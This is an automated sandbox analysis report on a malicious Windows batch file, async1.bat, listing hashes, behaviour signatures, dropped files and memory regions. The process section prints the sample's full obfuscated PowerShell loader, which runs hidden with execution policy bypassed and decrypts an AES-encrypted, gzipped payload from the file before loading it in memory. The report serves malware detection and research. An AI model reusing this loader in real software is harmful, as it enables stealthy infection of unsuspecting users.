Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    10/01/2023, 08:50

General

  • Target

    async1.bat

  • Size

    53KB

  • MD5

    48c5d502eb750b327615dec7362dabf9

  • SHA1

    93d7f7ce15d1ffc3b584056eadef6f72deede6bb

  • SHA256

    80c1568ef979e0d9881fa33ee69c3f8c15caa924acd4df9e4c951a7047577caa

  • SHA512

    15abd3360d6e9fa55892199a94f57d3d4a32798a15a5bb406d42bdb458cd679f4a27f8e310b4579d4b9c38d4384fd1e4015508ea68970c678facdf4a9cedc411

  • SSDEEP

    768:OonA1XlKQLUXpAyDnezCBrVvb5XEzbtMUVD96UKi2MLo2TmOtSBNodnU6gQBM:KXwQLUX/SC/v1UzbtTl1E238nyUBQBM

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\async1.bat"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:536
    • C:\Users\Admin\AppData\Local\Temp\async1.bat.exe
      "async1.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YJBbV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\async1.bat').Split([Environment]::NewLine);foreach ($NkUDf in $YJBbV) { if ($NkUDf.StartsWith(':: ')) { $JcNlJ = $NkUDf.Substring(3); break; }; };$JzMFw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($JcNlJ);$SCaAH = New-Object System.Security.Cryptography.AesManaged;$SCaAH.Mode = [System.Security.Cryptography.CipherMode]::CBC;$SCaAH.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$SCaAH.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('poUZgytmmU5AjB6HrelvPa2m9IAI5avoBXgweEVtJHM=');$SCaAH.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZJ8AebITHPrLQOysxJlupA==');$bcmpg = $SCaAH.CreateDecryptor();$JzMFw = $bcmpg.TransformFinalBlock($JzMFw, 0, $JzMFw.Length);$bcmpg.Dispose();$SCaAH.Dispose();$pvpsr = New-Object System.IO.MemoryStream(, $JzMFw);$fgJRB = New-Object System.IO.MemoryStream;$SFExd = New-Object System.IO.Compression.GZipStream($pvpsr, [IO.Compression.CompressionMode]::Decompress);$SFExd.CopyTo($fgJRB);$SFExd.Dispose();$pvpsr.Dispose();$fgJRB.Dispose();$JzMFw = $fgJRB.ToArray();$CxiQm = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($JzMFw);$Psztc = $CxiQm.EntryPoint;$Psztc.Invoke($null, (, [string[]] ('')))
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1536

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\async1.bat.exe

          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

        • \Users\Admin\AppData\Local\Temp\async1.bat.exe

          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

        • memory/1536-57-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

          Filesize

          8KB

        • memory/1536-58-0x000007FEF4A40000-0x000007FEF5463000-memory.dmp

          Filesize

          10.1MB

        • memory/1536-60-0x0000000002320000-0x00000000023A0000-memory.dmp

          Filesize

          512KB

        • memory/1536-59-0x000007FEF3EE0000-0x000007FEF4A3D000-memory.dmp

          Filesize

          11.4MB